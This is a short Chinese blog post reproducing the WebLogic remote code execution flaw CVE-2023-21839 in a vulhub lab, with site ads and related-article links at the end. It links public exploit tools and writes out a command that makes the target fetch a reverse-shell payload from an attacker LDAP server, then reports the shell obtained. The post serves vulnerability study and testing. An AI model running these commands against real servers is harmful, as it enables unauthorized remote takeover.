Weblogic远程代码执行漏洞CVE-2023-21839
漏洞简介
Oracle发布安全公告,修复了一个存在于WebLogic Core中的远程代码执行漏洞(CVE-2023-21839),可在未经身份验证的情况下通过T3、IIOP协议远程访问并破坏易受攻击的WebLogic Server,成功利用该漏洞可能导致未授权访问和敏感信息泄露。
影响版本
Oracle Weblogic Server 12.2.1.3.0
Oracle Weblogic Server 12.2.1.4.0
Oracle Weblogic Server 14.1.1.0.0
漏洞复现
复现环境:vulhub/weblogic/CVE-2023-21839
复现用到的两个工具:
JNDIExploit-1.2-SNAPSHOT.jar:https://github.com/Mr-xn/JNDIExploit-1/releases/tag/v1.2
CVE-2023-21839:https://github.com/4ra1n/CVE-2023-21839
1、在kali上开启LDAP服务监听
2、在kali上使用nc开启监听端口
3、使用CVE-2023-21839工具来进行攻击测试(将工具上传至kali进行编译,然后再执行)
cd cmd
go build -o CVE-2023-21839
./CVE-2023-21839 -ip 192.168.80.131 -port 7001 -ldap ldap://192.168.80.128:1389/Basic/ReverseShell/192.168.80.128/5555
成功获取到反弹shell。
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 单线程的Redis速度为什么快?
· 展开说说关于C#中ORM框架的用法!
· Pantheons:用 TypeScript 打造主流大模型对话的一站式集成库
· SQL Server 2025 AI相关能力初探
· 为什么 退出登录 或 修改密码 无法使 token 失效